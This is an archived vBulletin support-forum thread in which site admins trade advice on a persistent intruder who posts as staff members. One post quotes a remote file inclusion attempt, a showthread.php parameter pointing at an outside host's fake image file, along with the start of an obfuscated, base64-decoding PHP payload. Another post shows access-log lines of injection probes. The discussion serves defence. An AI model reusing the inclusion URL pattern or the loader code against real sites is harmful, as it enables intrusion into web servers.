Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Reload this Page weird user maybe a hacker
FAQ Community Calendar Today's Posts Search

Reply
Page 2 of 3 1 2 3
 
Thread Tools Display Modes
  #11  
Old 06-25-2008, 08:23 PM
Jase2 Jase2 is offline
 
Join Date: Dec 2007
Location: USA
Posts: 1,575
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Just disable the plugin/hook system and re-upload all vBulletin non-image files. This will then make your forums use to the vBulletin core code.
Reply With Quote
  #12  
Old 06-26-2008, 07:08 AM
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Location: Melbourne, Australia
Posts: 15,047
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
If the login to the server was changed, it indicates an issue with the server, not vBulletin.
Reply With Quote
  #13  
Old 06-26-2008, 07:27 AM
dtv100 dtv100 is offline
 
Join Date: Apr 2007
Location: in the south of the north
Posts: 307
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by Dismounted View Post
If the login to the server was changed, it indicates an issue with the server, not vBulletin.
sorry i know my English is bad what I mean I did all those change to prevent or make sure he don't get a hold of server .

I remove this hacks today because they was in both of my site so i think one of them maybe was the way he find in .

inferno shout box
login as user
arcade
google search tag
who is on chat
hide hack

trying to be safe and not sorry . the hacker and me been at war for days today seen he give up or took a day off .


is there any way I can hide with a password the follow tools from admincp :
generate email list
email members
forum manager
Reply With Quote
  #14  
Old 07-01-2008, 10:07 PM
dtv100 dtv100 is offline
 
Join Date: Apr 2007
Location: in the south of the north
Posts: 307
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
update
we change all server password ,vbulletin password ,we change location of admincp and remove links from forum to admincp (only site owner and i know link ),we hire a server tech to harden server ,we disable all hacks ,reupload vb original files and this guys still can log as post as anyone from staff .
I change my password everyday and still can post as me too .

any ideas where else to look ?
Reply With Quote
  #15  
Old 07-02-2008, 06:45 AM
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Location: Melbourne, Australia
Posts: 15,047
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Are you sure they haven't uploaded any malicious files?
Reply With Quote
  #16  
Old 07-02-2008, 07:58 AM
dtv100 dtv100 is offline
 
Join Date: Apr 2007
Location: in the south of the north
Posts: 307
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by Dismounted View Post
Are you sure they haven't uploaded any malicious files?

OK i will delete everything on server except for sql ,avatars,profiles picture attachment and a few php file I wrote my self (extra pages) and will re upload all vb files .

to make sure that no file we did not upload is there .
Reply With Quote
  #17  
Old 07-16-2008, 04:43 AM
ThatSnowGuy ThatSnowGuy is offline
 
Join Date: Nov 2003
Posts: 3
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I have a guest on my site that is viewing an error message. This is the guests location:

/forums/showthread. php?t = http://64.15.67.17/~calebsbi/logo.jpg

I added some spaces, not sure if posting the link is OK here or not, but it is not a link to a .jpg, it is some type of script. I reported abuse to the host of the account, so I am not sure how long the link will work for.

Here is how it starts out. I am removing the first character so it will show here. (I hope)

? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9));
return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po"

It's a pretty long script.

~Chuck
Reply With Quote
  #18  
Old 07-16-2008, 09:33 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I guess thos was a failed attempt to do a XSS attack on your forum.
Reply With Quote
  #19  
Old 07-16-2008, 11:40 AM
ThatSnowGuy ThatSnowGuy is offline
 
Join Date: Nov 2003
Posts: 3
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Thanks for the reply Marco. I am guessing it may have been a bot as it stayed around for hours, even after I turned off the Forums for an hour.

~Chuck
Reply With Quote
  #20  
Old 08-10-2008, 07:34 PM
dtv100 dtv100 is offline
 
Join Date: Apr 2007
Location: in the south of the north
Posts: 307
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
i find this on my logs after hacker try again maybe someone could tell me if he trying a injection and how to block it.

Code:
2008-08-05, 14:25:57, 1217946357, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:24, 1217947404, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:59, 1217947439, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:47:52, 1217947672, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%1as%20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 15:01:31, 1217948491, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 20:27:26, 1217968046, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reply With Quote
Reply
Page 2 of 3 1 2 3

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 01:16 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.09538 seconds
  • Memory Usage 2,273KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (2)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete